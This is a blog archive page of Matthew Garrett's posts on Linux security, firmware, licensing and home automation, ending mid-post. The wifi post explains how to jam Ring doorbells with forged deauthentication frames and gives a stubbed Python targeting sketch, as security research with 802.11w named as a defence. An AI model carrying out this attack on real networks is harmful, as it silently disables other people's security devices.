Tag Archives: fedora

Making my doorbell work

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/55312.html

I recently moved house, and the new building has a Doorbird to act as a doorbell and open the entrance gate for people. There’s a documented local control API (no cloud dependency!) and a Home Assistant integration, so this seemed pretty straightforward.

Unfortunately not. The Doorbird is on a separate network that’s shared across the building, provided by Monkeybrains. We’re also a Monkeybrains customer, so our network connection is plugged into the same router and antenna as the Doorbird one. And, as is common, there’s port isolation between the networks in order to avoid leakage of information between customers. Rather perversely, we are the only people with an internet connection who are unable to ping my doorbell.

I spent most of the past few weeks digging myself out from under a pile of boxes, but we’d finally reached the point where spending some time figuring out a solution to this seemed reasonable. I spent a while playing with port forwarding, but that wasn’t ideal – the only server I run is in the UK, and having packets round trip almost 11,000 miles so I could speak to something a few metres away seemed like a bad plan. Then I tried tethering an old Android device with a data-only SIM, which worked fine but only in one direction (I could see what the doorbell could see, but I couldn’t get notifications that someone had pushed a button, which was kind of the point here).

So I went with the obvious solution – I added a wifi access point to the doorbell network, so my home automation machine now exists on two networks simultaneously (nmcli device modify wlan0 ipv4.never-default true is the magic for “ignore the default gateway that the DHCP server gives you”, which you want here so the doorbell network doesn’t hijack your default route). That also meant I could use link-local service discovery to find the doorbell again if it changed address after a power cut or anything. And then, like magic, everything worked – I got notifications from the doorbell when someone hit our button.

But knowing that an event occurred without actually doing something in response seems fairly unhelpful. I have a bunch of Chromecast targets around the house (a mixture of Google Home devices and Chromecast Audios), so just pushing a message to them seemed like the easiest approach. Home Assistant has a text to speech integration that can call out to various services to turn some text into a sample, and then push that to a media player on the local network. You can group multiple Chromecast audio sinks into a group that then presents as a separate device on the network, so I could then write an automation to push audio to the speaker group in response to the button being pressed.
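What that automation’s action boils down to is a single service call into Home Assistant. Here’s a minimal sketch of the equivalent call over Home Assistant’s REST API – the host, the access token, the speaker group entity name and the choice of the google_translate_say TTS service are all assumptions, so substitute your own:

```python
import json
import urllib.request

# Assumed values: your Home Assistant address and a long-lived access token.
HASS = "http://homeassistant.local:8123"
TOKEN = "YOUR_LONG_LIVED_ACCESS_TOKEN"

def announce_request(message, entity_id="media_player.everywhere"):
    """Build the REST call asking Home Assistant's TTS integration to
    speak `message` on a media player (here, a Chromecast speaker group)."""
    payload = json.dumps({"entity_id": entity_id, "message": message}).encode()
    return urllib.request.Request(
        HASS + "/api/services/tts/google_translate_say",
        data=payload,
        headers={"Authorization": "Bearer " + TOKEN,
                 "Content-Type": "application/json"},
    )

req = announce_request("Someone is at the door")
print(req.full_url)
```

In practice you’d hand the request to urllib.request.urlopen() (or, more naturally, express the same service call as a Home Assistant automation action).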

That’s nice, but it’d also be nice to do something in response. The Doorbird exposes API control of the gate latch, and Home Assistant exposes that as a switch. I’m using Home Assistant’s Google Assistant integration to expose devices Home Assistant knows about to voice control. Which means when I get a house-wide notification that someone’s at the door I can just ask Google to open the door for them.
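The underlying Doorbird call is similarly small. A sketch, assuming the /bha-api/open-door.cgi relay endpoint from Doorbird’s published LAN API, with a placeholder address and credentials:

```python
import base64
import urllib.request

# Placeholders: the Doorbird's LAN address and its app-level credentials.
DOORBIRD = "http://192.168.123.17"
USER, PASSWORD = "doorbird-user", "doorbird-password"

def open_gate_request():
    """Build the HTTP request that asks the Doorbird to trigger its
    relay (i.e. open the gate), authenticated with HTTP basic auth."""
    req = urllib.request.Request(DOORBIRD + "/bha-api/open-door.cgi")
    creds = base64.b64encode(f"{USER}:{PASSWORD}".encode()).decode()
    req.add_header("Authorization", "Basic " + creds)
    return req

req = open_gate_request()
print(req.full_url)
```

Home Assistant’s Doorbird integration wraps this up as a switch entity, which is what the Google Assistant integration then exposes to voice control.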

So. Someone pushes the doorbell. That sends a signal to a machine that’s bridged onto that network via an access point. That machine then sends a protobuf command to speakers on a separate network, asking them to stream a sample it’s providing. Those speakers call back to that machine, grab the sample and play it. At this point, multiple speakers in the house say “Someone is at the door”. I then say “Hey Google, activate the front gate” – the device I’m closest to picks this up and sends it to Google, where something turns my speech back into text. It then looks at my home structure data and realises that the “Front Gate” device is associated with my Home Assistant integration. It then calls out to the home automation machine that received the notification in the first place, asking it to trigger the front gate relay. That device calls out to the Doorbird and asks it to open the gate. And now I have functionality equivalent to a doorbell that completes a circuit and rings a bell inside my home, and a button inside my home that completes a circuit and opens the gate, except it involves two networks inside my building, callouts to the cloud, at least 7 devices inside my home that are running Linux and I really don’t want to know how many computational cycles.

The future is wonderful.

(I work for Google. I do not work on any of the products described in this post. Please god do not ask me how to integrate your IoT into any of this)


Linux kernel lockdown, integrity, and confidentiality

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/55105.html

The Linux kernel lockdown patches were merged into the 5.4 kernel last year, which means they’re now part of multiple distributions. For me this was a 7-year journey, which means it’s easy to forget that others aren’t as invested in the code as I am. Here’s what these patches are intended to achieve, why they’re implemented in the current form and what people should take into account when deploying the feature.

Root is a user – a privileged user, but nevertheless a user. Root is not identical to the kernel. Processes running as root still can’t dereference addresses that belong to the kernel, are still subject to the whims of the scheduler and so on. But historically that boundary has been very porous. Various interfaces make it straightforward for root to modify kernel code (such as loading modules or using /dev/mem), while others make it less straightforward (being able to load new ACPI tables that can cause the ACPI interpreter to overwrite the kernel, for instance). In the past that wasn’t seen as a significant issue, since there were no widely deployed mechanisms for verifying the integrity of the kernel in the first place. But once UEFI secure boot became widely deployed, this was a problem. If you verify your boot chain but allow root to modify that kernel, the benefits of the verified boot chain are significantly reduced. Even if root can’t modify the on-disk kernel, root can just hot-patch the kernel and then make this persistent by dropping a binary that repeats the process on system boot.

Lockdown is intended as a mechanism to avoid that, by providing an optional policy that closes off interfaces that allow root to modify the kernel. This was the sole purpose of the original implementation, which maps to the “integrity” mode that’s present in the current implementation. Kernels that boot in lockdown integrity mode prevent even root from using these interfaces, increasing assurances that the running kernel corresponds to the booted kernel. But lockdown’s functionality has been extended since then. There are some use cases where preventing root from being able to modify the kernel isn’t enough – the kernel may hold secret information that even root shouldn’t be permitted to see (such as the EVM signing key that can be used to prevent offline file modification), and the integrity mode doesn’t prevent that. This is where lockdown’s confidentiality mode comes in. Confidentiality mode is a superset of integrity mode, with additional restrictions on root’s ability to use features that would allow the inspection of any kernel memory that could contain secrets.

Unfortunately right now we don’t have strong mechanisms for marking which bits of kernel memory contain secrets, so in order to achieve that we end up blocking access to all kernel memory. Unsurprisingly, this compromises people’s ability to inspect the kernel for entirely legitimate reasons, such as using the various mechanisms that allow tracing and probing of the kernel.
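Whether a booted kernel is locked down, and in which mode, is exposed through securityfs. A small sketch of parsing that one-line format, where the bracketed entry is the active mode:

```python
def lockdown_mode(state):
    """Parse the /sys/kernel/security/lockdown format, where the active
    mode is the bracketed entry, e.g. "none [integrity] confidentiality"."""
    for token in state.split():
        if token.startswith("[") and token.endswith("]"):
            return token[1:-1]
    return None

# On a real system you'd read the file itself:
# mode = lockdown_mode(open("/sys/kernel/security/lockdown").read())
print(lockdown_mode("none [integrity] confidentiality"))  # -> integrity
```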

How can we solve this? There are a few ways:

  1. Introduce a mechanism to tag memory containing secrets, and only restrict accesses to this. I’ve tried to do something similar for userland and it turns out to be hard, but this is probably the best long-term solution.
  2. Add support for privileged applications with an appropriate signature that implement policy on the userland side. This is actually possible already, though not straightforward. Lockdown is implemented in the LSM layer, which means the policy can be imposed using any other existing LSM. As an example, we could use SELinux to impose the confidentiality restrictions on most processes but permit processes with a specific SELinux context to use them, and then use EVM to ensure that any process running in that context has a legitimate signature. This is quite a few hoops for a general purpose distribution to jump through.
  3. Don’t use confidentiality mode in general purpose distributions. The attacks it protects against are mostly against special-purpose use cases, and they can enable it themselves.

My recommendation is for (3), and I’d encourage general purpose distributions that enable lockdown to do so only in integrity mode rather than confidentiality mode. The cost of confidentiality mode is just too high compared to the benefits it provides. People who need confidentiality mode probably already know that they do, and should be in a position to enable it themselves and handle the consequences.


Implementing support for advanced DPTF policy in Linux

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/54923.html

Intel’s Dynamic Platform and Thermal Framework (DPTF) is a feature that’s becoming increasingly common on highly portable Intel-based devices. The adaptive policy it implements is based around the idea that thermal management of a system is becoming increasingly complicated – the appropriate set of cooling constraints to place on a system may differ based on a whole bunch of criteria (eg, if a tablet is being held vertically rather than lying on a table, it’s probably going to be able to dissipate heat more effectively, so you should impose different constraints). One way of providing these criteria to the OS is to embed them in the system firmware, allowing an OS-level agent to read that and then incorporate OS-level knowledge into a final policy decision.

Unfortunately, while Intel have released some amount of support for DPTF on Linux, they haven’t included support for the adaptive policy. And even more annoyingly, many modern laptops run in a heavily conservative thermal state if the OS doesn’t support the adaptive policy, meaning that the CPU throttles down extremely quickly and the laptop runs excessively slowly.

It’s been a while since I really got stuck into a laptop reverse engineering project, and I don’t have much else to do right now, so I’ve been working on this. It’s been a combination of examining what source Intel have released, reverse engineering the Windows code and staring hard at hex dumps until they made some sort of sense. Here’s where I am.

There’s two main components to the adaptive policy – the adaptive conditions table (APCT) and the adaptive actions table (APAT). The adaptive conditions table contains a set of condition sets, with up to 10 conditions in each condition set. A condition is something like “is the battery above a certain charge”, “is this temperature sensor below a certain value”, “is the lid open or closed”, “is the machine upright or horizontal” and so on. Each condition set is evaluated in turn – if all the conditions evaluate to true, the condition set’s target is implemented. If not, we move onto the next condition set. There will typically be a fallback condition set to catch the case where none of the other condition sets evaluate to true.

The action table contains sets of actions associated with a specific target. Once we’ve picked a target by evaluating the conditions, we execute the actions that have a corresponding target. Actions are things like “Set the CPU power limit to this value” or “Load a passive policy table”. Passive policy tables are simply tables associating sensors with devices and an associated temperature limit. If the limit is exceeded, the associated device should be asked to reduce its heat output until the situation is resolved.

There’s a couple of twists. The first is the OEM conditions. These are conditions that refer to values that are exposed by the firmware and are otherwise entirely opaque – the firmware knows what these mean, but we don’t, so conditions that rely on these values are magical. They could be temperature, they could be power consumption, they could be SKU variations. We just don’t know. The other is that older versions of the APCT table didn’t include a reference to a device – ie, if you specified a condition based on a temperature, you had no way to express which temperature sensor to use. So, instead, you specified a condition that’s greater than 0x10000, which tells the agent to look at the APPC table to extract the device and the appropriate actual condition.
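As a rough illustration of the evaluation logic described above – condition sets tried in order, the first fully-satisfied set picking a target, and the actions tagged with that target then being executed. The condition names, sensor values and actions here are all invented for the sketch, not Intel’s actual encoding:

```python
def evaluate_conditions(condition_sets, sensors):
    """Return the target of the first condition set whose conditions all
    hold. Well-formed tables end with a catch-all fallback set."""
    for cset in condition_sets:
        if all(cond(sensors) for cond in cset["conditions"]):
            return cset["target"]
    return None

def actions_for(target, action_table):
    """Collect the actions associated with the chosen target."""
    return [a["action"] for a in action_table if a["target"] == target]

condition_sets = [
    {"conditions": [lambda s: s["lid_open"], lambda s: s["skin_temp"] < 45],
     "target": "performance"},
    {"conditions": [],  # empty set is vacuously true: the fallback
     "target": "quiet"},
]
action_table = [
    {"target": "performance", "action": ("set_power_limit_w", 25)},
    {"target": "quiet", "action": ("set_power_limit_w", 9)},
]

target = evaluate_conditions(condition_sets, {"lid_open": True, "skin_temp": 38})
print(target, actions_for(target, action_table))
```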

Intel already have a Linux app called Thermal Daemon that implements a subset of this – you’re supposed to run the binary-only dptfxtract against your firmware to parse a few bits of the DPTF tables, and it writes out an XML file that Thermal Daemon makes use of. Unfortunately it doesn’t handle most of the more interesting bits of the adaptive performance policy, so I’ve spent the past couple of days extending it to do so and to remove the proprietary dependency.

My current work is here – it requires a couple of kernel patches (that are in the patches directory), and it only supports a very small subset of the possible conditions. It’s also entirely possible that it’ll do something inappropriate and cause your computer to melt – none of this is publicly documented, I don’t have access to the spec and you’re relying on my best guesses in a lot of places. But it seems to behave roughly as expected on the one test machine I have here, so time to get some wider testing?


What usage restrictions can we place in a free software license?

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/54709.html

Growing awareness of the wider social and political impact of software development has led to efforts to write licenses that prevent software being used to engage in acts that are seen as socially harmful, with the Hippocratic License being perhaps the most discussed example (although the JSON license’s requirement that the software be used for good, not evil, is arguably an earlier version of the theme). The problem with these licenses is that they’re pretty much universally considered to fall outside the definition of free software or open source licenses due to their restrictions on use, and there’s a whole bunch of people who have very strong feelings that this is a very important thing. There’s also the more fundamental underlying point that it’s hard to write a license like this where everyone agrees on whether a specific thing is bad or not (eg, while many people working on a project may feel that it’s reasonable to prohibit the software being used to support drone strikes, others may feel that the project shouldn’t have a position on the use of the software to support drone strikes and some may even feel that some people should be the victims of drone strikes). This is, it turns out, all quite complicated.

But there is something that many (but not all) people in the free software community agree on – certain restrictions are legitimate if they ultimately provide more freedom. Traditionally this was limited to restrictions on distribution (eg, the GPL requires that your recipient be able to obtain corresponding source code, and for GPLv3 must also be able to obtain the necessary signing keys to be able to replace it in covered devices), but more recently there’s been some restrictions that don’t require distribution. The best known is probably the clause in the Affero GPL (or AGPL) that requires that users interacting with covered code over a network be able to download the source code, but the Cryptographic Autonomy License (recently approved as an Open Source license) goes further and requires that users be able to obtain their data in order to self-host an equivalent instance.

We can construct examples of where these prevent certain fields of endeavour, but the tradeoff has been deemed worth it – the benefits to user freedom that these licenses provide are greater than the corresponding cost to what you can do. How far can that tradeoff be pushed? So, here’s a thought experiment. What if we write a license that’s something like the following:

Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:

1. All permissions granted by this license must be passed on to all recipients of modified or unmodified versions of this work
2. This work may not be used in any way that impairs any individual's ability to exercise the permissions granted by this license, whether or not they have received a copy of the covered work

This feels like the logical extreme of the argument. Any way you could use the covered work that would restrict someone else’s ability to do the same is prohibited. This means that, for example, you couldn’t use the software to implement a DRM mechanism that the user couldn’t replace (along the lines of GPLv3’s anti-Tivoisation clause), but it would also mean that you couldn’t use the software to kill someone with a drone (doing so would impair their ability to make use of the software). The net effect is along the lines of the Hippocratic license, but it’s framed in a way that is focused on user freedom.

To be clear, I don’t think this is a good license – it has a bunch of unfortunate consequences like it being impossible to use covered code in self-defence if doing so would impair your attacker’s ability to use the software. I’m not advocating this as a solution to anything. But I am interested in seeing whether the perception of the argument changes when we refocus it on user freedom as opposed to an independent ethical goal.

Thoughts?

Edit:

Rich Felker on Twitter had an interesting thought – if clause 2 above is replaced with:

2. Your rights under this license terminate if you impair any individual's ability to exercise the permissions granted by this license, even if the covered work is not used to do so

how does that change things? My gut feeling is that covering actions that are unrelated to the use of the software might be a reach too far, but it gets away from the idea that it’s your use of the software that triggers the clause.


Avoiding gaps in IOMMU protection at boot

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/54433.html

When you save a large file to disk or upload a large texture to your graphics card, you probably don’t want your CPU to sit there spending an extended period of time copying data between system memory and the relevant peripheral – it could be doing something more useful instead. As a result, most hardware that deals with large quantities of data is capable of Direct Memory Access (or DMA). DMA-capable devices are able to access system memory directly without the aid of the CPU – the CPU simply tells the device which region of memory to copy and then leaves it to get on with things. However, we also need to get data back to system memory, so DMA is bidirectional. This means that DMA-capable devices are able to read and write directly to system memory.

As long as devices are entirely under the control of the OS, this seems fine. However, this isn’t always true – there may be bugs, the device may be passed through to a guest VM (and so no longer under the control of the host OS) or the device may be running firmware that makes it actively malicious. The third is an important point here – while we usually think of DMA as something that has to be set up by the OS, at a technical level the transactions are initiated by the device. A device that’s running hostile firmware is entirely capable of choosing what and where to DMA.

Most reasonably recent hardware includes an IOMMU to handle this. The CPU’s MMU exists to define which regions of memory a process can read or write – the IOMMU does the same but for external IO devices. An operating system that knows how to use the IOMMU can allocate specific regions of memory that a device can DMA to or from, and any attempt to access memory outside those regions will fail. This was originally intended to handle passing devices through to guests (the host can protect itself by restricting any DMA to memory belonging to the guest – if the guest tries to read or write to memory belonging to the host, the attempt will fail), but is just as relevant to preventing malicious devices from extracting secrets from your OS or even modifying the runtime state of the OS.

But setting things up in the OS isn’t sufficient. If an attacker is able to trigger arbitrary DMA before the OS has started then they can tamper with the system firmware or your bootloader and modify the kernel before it even starts running. So ideally you want your firmware to set up the IOMMU before it even enables any external devices, and newer firmware should actually do this automatically. It sounds like the problem is solved.

Except there’s a problem. Not all operating systems know how to program the IOMMU, and if a naive OS fails to remove the IOMMU mappings and asks a device to DMA to an address that the IOMMU doesn’t grant access to then things are likely to explode messily. EFI has an explicit transition between the boot environment and the runtime environment triggered when the OS or bootloader calls ExitBootServices(). Various EFI components have registered callbacks that are triggered at this point, and the IOMMU driver will (in general) then tear down the IOMMU mappings before passing control to the OS. If the OS is IOMMU aware it’ll then program new mappings, but there’s a brief window where the IOMMU protection is missing – and a sufficiently malicious device could take advantage of that.

The ideal solution would be a protocol that allowed the OS to indicate to the firmware that it supported this functionality and request that the firmware not remove it, but in the absence of such a protocol we’re left with non-ideal solutions. One is to prevent devices from being able to DMA in the first place, which means the absence of any IOMMU restrictions is largely irrelevant. Every PCI device has a busmaster bit – if the busmaster bit is disabled, the device shouldn’t start any DMA transactions. Clearing that seems like a straightforward approach. Unfortunately this bit is under the control of the device itself, so a malicious device can just ignore this and do DMA anyway. Fortunately, PCI bridges and PCIe root ports should only forward DMA transactions if their busmaster bit is set. If we clear that then any devices downstream of the bridge or port shouldn’t be able to DMA, no matter how malicious they are. Linux will only re-enable the bit after it’s done IOMMU setup, so we should then be in a much more secure state – we still need to trust that our motherboard chipset isn’t malicious, but we don’t need to trust individual third party PCI devices.
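For a sense of where that bit lives, here’s a sketch of inspecting it from userspace – this is for illustration, not the kernel’s actual implementation. The 16-bit command register sits at offset 4 of PCI configuration space, little-endian, and bus master enable is bit 2:

```python
import struct

BUS_MASTER = 0x4  # bit 2 of the PCI command register

def bus_master_enabled(config_space):
    """Check the bus master enable bit in a raw dump of a device's
    PCI configuration space."""
    (command,) = struct.unpack_from("<H", config_space, 4)
    return bool(command & BUS_MASTER)

# On Linux, config space is exposed in sysfs, e.g.:
# raw = open("/sys/bus/pci/devices/0000:00:1c.0/config", "rb").read()

# Synthetic example: vendor 0x8086, command register 0x0007
# (IO space, memory space and bus master all enabled).
sample = bytes([0x86, 0x80, 0x00, 0x9d, 0x07, 0x00]) + bytes(58)
print(bus_master_enabled(sample))  # -> True
```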

This patch just got merged, adding support for this. My original version did nothing other than clear the bits on bridge devices, but this did have the potential for breaking devices that were still carrying out DMA at the moment this code ran. Ard modified it to call the driver shutdown code for each device behind a bridge before disabling DMA on the bridge, which in theory makes this safe but does still depend on the firmware drivers behaving correctly. As a result it’s not enabled by default – you can either turn it on in kernel config or pass the efi=disable_early_pci_dma kernel command line argument.

In combination with firmware that does the right thing, this should ensure that Linux systems can be protected against malicious PCI devices throughout the entire boot process.


Verifying your system state in a secure and private way

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/54203.html

Most modern PCs have a Trusted Platform Module (TPM) and firmware that, together, support something called Trusted Boot. In Trusted Boot, each component in the boot chain generates a series of measurements of the next component of the boot process and relevant configuration. These measurements are pushed to the TPM where they’re combined with the existing values stored in a series of Platform Configuration Registers (PCRs) in such a way that the final PCR value depends on both the value and the order of the measurements it’s given. If any measurements change, the final PCR value changes.

Windows takes advantage of this with its Bitlocker disk encryption technology. The disk encryption key is stored in the TPM along with a policy that tells it to release it only if a specific set of PCR values is correct. By default, the TPM will release the encryption key automatically if the PCR values match and the system will just transparently boot. If someone tampers with the boot process or configuration, the PCR values will no longer match and boot will halt to allow the user to provide the disk key in some other way.

Unfortunately the TPM keeps no record of how it got to a specific state. If the PCR values don’t match, that’s all we know – the TPM is unable to tell us what changed to result in this breakage. Fortunately, the system firmware maintains an event log as we go along. Each measurement that’s pushed to the TPM is accompanied by a new entry in the event log, containing not only the hash that was pushed to the TPM but also metadata that tells us what was measured and why. Since the algorithm the TPM uses to calculate the hash values is known, we can replay the same values from the event log and verify that we end up with the same final value that’s in the TPM. We can then examine the event log to see what changed.
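The replay itself is simple: each extend computes a hash of the old register value concatenated with the new measurement, starting from an all-zero register. A sketch using SHA-256 and invented event digests:

```python
import hashlib

def replay_pcr(measurements, alg="sha256"):
    """Replay TPM PCR extends: each step computes H(old_pcr || measurement),
    starting from an all-zero register, mirroring what the TPM does."""
    digest_size = hashlib.new(alg).digest_size
    pcr = bytes(digest_size)
    for m in measurements:
        pcr = hashlib.new(alg, pcr + m).digest()
    return pcr

# Two hypothetical event log entries (the real log stores these digests
# alongside metadata describing what was measured and why):
log = [hashlib.sha256(b"bootloader").digest(),
       hashlib.sha256(b"kernel").digest()]
replayed = replay_pcr(log)
print(replayed.hex())
```

If the replayed value matches the PCR in the TPM, the log is consistent with it. Note that swapping the two events gives a different final value, which is exactly how the PCR captures the order of the boot chain as well as its contents.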

Unfortunately, the event log is stored in unprotected system RAM. In order to be able to trust it we need to compare the values in the event log (which can be tampered with) with the values in the TPM (which are much harder to tamper with). Unfortunately if someone has tampered with the event log then they could also have tampered with the bits of the OS that are doing that comparison. Put simply, if the machine is in a potentially untrustworthy state, we can’t trust that machine to tell us anything about itself.

This is solved using a procedure called Remote Attestation. The TPM can be asked to provide a digital signature of the PCR values, and this can be passed to a remote system along with the event log. That remote system can then examine the event log, make sure it corresponds to the signed PCR values and make a security decision based on the contents of the event log rather than just on the final PCR values. This makes the system significantly more flexible and aids diagnostics. Unfortunately, it also means you need a remote server and an internet connection and then some way for that remote server to tell you whether it thinks your system is trustworthy and also you need some way to believe that the remote server is trustworthy and all of this is well not ideal if you’re not an enterprise.

Last week I gave a talk at linux.conf.au on one way around this. Basically, remote attestation places no constraints on the network protocol in use – while the implementations that exist all do this over IP, there’s no requirement for them to do so. So I wrote an implementation that runs over Bluetooth, in theory allowing you to use your phone to serve as the remote agent. If you trust your phone, you can use it as a tool for determining if you should trust your laptop.

I’ve pushed some code that demos this. The current implementation does nothing other than tell you whether UEFI Secure Boot was enabled or not, and it’s also not currently running on a phone. The phone bit of this is pretty straightforward to fix, but the rest is somewhat harder.

The big issue we face is that we frequently don’t know what event log values we should be seeing. The first few values are produced by the system firmware and there’s no standardised way to publish the expected values. The Linux Vendor Firmware Service has support for publishing these values, so for some systems we can get hold of this. But then you get to measurements of your bootloader and kernel, and those change every time you do an update. Ideally we’d have tooling for Linux distributions to publish known good values for each package version and for that to be common across distributions. This would allow tools to download metadata and verify that measurements correspond to legitimate builds from the distribution in question.

This does still leave the problem of the initramfs. Since initramfs files are usually generated locally, and depend on the locally installed versions of tools at the point they’re built, we end up with no good way to precalculate those values. I proposed a possible solution to this a while back, but have done absolutely nothing to help make that happen. I suck. The right way to do this may actually just be to turn initramfs images into pre-built artifacts and figure out the config at runtime (dracut actually supports a bunch of this already), so I’m going to spend a while playing with that.

If we can pull these pieces together then we can get to a place where you can boot your laptop and then, before typing any authentication details, have your phone compare each component in the boot process to expected values. Assistance in all of this extremely gratefully received.


Wifi deauthentication attacks and home security

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/53968.html

I live in a large apartment complex (it’s literally a city block big), so I spend a disproportionate amount of time walking down corridors. Recently one of my neighbours installed a Ring wireless doorbell. By default these are motion activated (and the process for disabling motion detection is far from obvious), and if the owner subscribes to an appropriate plan these recordings are stored in the cloud. I’m not super enthusiastic about the idea of having my conversations recorded while I’m walking past someone’s door, so I decided to look into the security of these devices.

One visit to Amazon later and I had a refurbished Ring Video Doorbell 2™ sitting on my desk. Tearing it down revealed it uses a TI SoC that’s optimised for this sort of application, linked to a DSP that presumably does stuff like motion detection. The device spends most of its time in a sleep state where it generates no network activity, so on any wakeup it has to reassociate with the wireless network and start streaming data.

So we have a device that’s silent and undetectable until it starts recording you, which isn’t a great place to start from. But fortunately wifi has a few, uh, interesting design choices that mean we can still do something. The first is that even on an encrypted network, the packet headers are unencrypted and contain the address of the access point and whichever device is communicating. This means that it’s possible to just dump whatever traffic is floating past and build up a collection of device addresses. Address ranges are allocated by the IEEE, so it’s possible to map the addresses you see to manufacturers and get some idea of what’s actually on the network[1] even if you can’t see what they’re actually transmitting. The second is that various management frames aren’t encrypted, and so can be faked even if you don’t have the network credentials.
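The address-to-manufacturer step is just a prefix lookup: the first three octets of a MAC address are the IEEE-assigned OUI. A sketch, where the tiny table stands in for the real IEEE registry and its entries are illustrative rather than authoritative:

```python
# Stand-in for the IEEE OUI registry; entries here are illustrative only.
OUI_SAMPLE = {
    "00:01:02": "3Com",
    "a0:9d:c1": "Texas Instruments",  # hypothetical entry for the example
}

def oui(mac):
    """Normalise a MAC address and return its first three octets."""
    return mac.lower().replace("-", ":")[:8]

def vendor(mac, table=OUI_SAMPLE):
    return table.get(oui(mac), "unknown")

print(vendor("A0:9D:C1:12:34:56"))
```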

The most interesting one here is the deauthentication frame that access points can use to tell clients that they’re no longer welcome. These can be sent for a variety of reasons, including resource exhaustion or authentication failure. And, by default, they’re entirely unprotected. Anyone can inject such a frame into your network and cause clients to believe they’re no longer authorised to use the network, at which point they’ll have to go through a new authentication cycle – and while they’re doing that, they’re not able to send any other packets.

So, the attack is to simply monitor the network for any devices that fall into the address range you want to target, and then immediately start shooting deauthentication frames at them once you see one. I hacked airodump-ng to ignore all clients that didn’t look like a Ring, and then pasted in code from aireplay-ng to send deauthentication packets once it saw one. The problem here is that wifi cards can only be tuned to one frequency at a time, so unless you know the channel your potential target is on, you need to keep jumping between frequencies while looking for a target – and that means a target can potentially shoot off a notification while you’re looking at other frequencies.
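Stripped of the capture and injection plumbing, the targeting logic is tiny. A sketch with both stubbed out – the vendor prefix here is a placeholder, and a real implementation would sit on a monitor-mode interface and inject actual deauthentication frames:

```python
# Sketch of the targeting logic: watch 802.11 frames for client
# addresses in a vendor range and fire deauthentication frames at any
# match. Capture and injection are stubbed out here.
TARGET_OUIS = {"00:17:E5"}  # hypothetical vendor prefix

def is_target(client_mac: str) -> bool:
    return client_mac.upper()[:8] in TARGET_OUIS

def send_deauth(ap_mac: str, client_mac: str, sent_log: list) -> None:
    # Stub: a real version injects an unprotected deauthentication
    # management frame (e.g. reason code 7) on the client's channel.
    sent_log.append((ap_mac, client_mac))

def handle_frame(ap_mac: str, client_mac: str, sent_log: list) -> None:
    if is_target(client_mac):
        send_deauth(ap_mac, client_mac, sent_log)

log = []
handle_frame("AA:BB:CC:00:00:01", "00:17:E5:12:34:56", log)  # target: deauthed
handle_frame("AA:BB:CC:00:00:01", "DE:AD:BE:EF:00:01", log)  # ignored
```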

But even with that proviso, this seems to work reasonably reliably. I can hit the button on my Ring, see it show up in my hacked up code and see my phone receive no push notification. Even if it does get a notification, the doorbell is no longer accessible by the time I respond.

There are a couple of ways to avoid this attack. The first is to use 802.11w, which protects management frames. A lot of hardware supports this, but it’s generally disabled by default. The second is to just ignore deauthentication frames in the first place, which is a spec violation – but you’re already building a device that exists to record strangers engaging in a range of legal activities, so paying attention to social norms is clearly not a priority in any case.

Finally, none of this is even slightly new. A presentation from Def Con in 2016 covered this, demonstrating that Nest cameras could be blocked in the same way. The industry doesn’t seem to have learned from this.

[1] The Ring Video Doorbell 2 just uses addresses from TI’s range rather than anything Ring specific, unfortunately


Extending proprietary PC embedded controller firmware

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/53703.html

I’m still playing with my X210, a device that just keeps coming up with new ways to teach me things. I’m now running Coreboot full time, so the majority of the runtime platform firmware is free software. Unfortunately, the firmware that’s running on the embedded controller (a separate chip that’s awake even when the rest of the system is asleep and which handles stuff like fan control, battery charging, transitioning into different power states and so on) is proprietary and the manufacturer of the chip won’t release data sheets for it. This was disappointing, because the stock EC firmware is kind of annoying (there’s no hysteresis on the fan control, so it hits a threshold, speeds up, drops below the threshold, turns off, and repeats every few seconds – also, a bunch of the Thinkpad hotkeys don’t do anything) and it would be nice to be able to improve it.

A few months ago someone posted a bunch of fixes, a Ghidra project and a kernel patch that lets you overwrite the EC’s code at runtime for purposes of experimentation. This seemed promising. Some amount of playing later and I’d produced a patch that generated keyboard scancodes for all the missing hotkeys, and I could then use udev to map those scancodes to the keycodes that the thinkpad_acpi driver would generate. I finally had a hotkey to tell me how much battery I had left.
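For reference, the udev side of that is just a hwdb entry mapping the new scancode to a keycode. A sketch assuming a hypothetical scancode of 0x45 – the match pattern and key name would need adjusting for the real machine:

```
# /etc/udev/hwdb.d/90-x210-ec-hotkeys.hwdb (hypothetical scancode)
evdev:atkbd:dmi:bvn*:bvr*:bd*:svnLENOVO*:pn*
 KEYBOARD_KEY_45=battery
```

followed by `systemd-hwdb update` and `udevadm trigger` to apply it.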

But something else included in that post was a list of the GPIO mappings on the EC. A whole bunch of hardware on the board is connected to the EC in ways that allow it to control them, including things like disabling the backlight or switching the wifi card to airplane mode. Unfortunately the ACPI spec doesn’t cover how to control GPIO lines attached to the embedded controller – the only real way we have to communicate is via a set of registers that the EC firmware interprets and does stuff with.

One of those registers in the vendor firmware for the X210 looked promising, with individual bits that looked like radio control. Unfortunately writing to them does nothing – the EC firmware simply stashes that write in an address and returns it on read without parsing the bits in any way. Doing anything more with them was going to involve modifying the embedded controller code.

Thankfully the EC has 64K of firmware and is only using about 40K of that, so there’s plenty of room to add new code. The problem was generating the code in the first place and then getting it called. The EC is based on the CR16C architecture, which binutils supported until 10 days ago. To be fair it didn’t appear to actually work, and binutils still has support for the more generic version of the CR16 family, so I built a cross assembler, wrote some assembly and came up with something that Ghidra was willing to parse except for one thing.

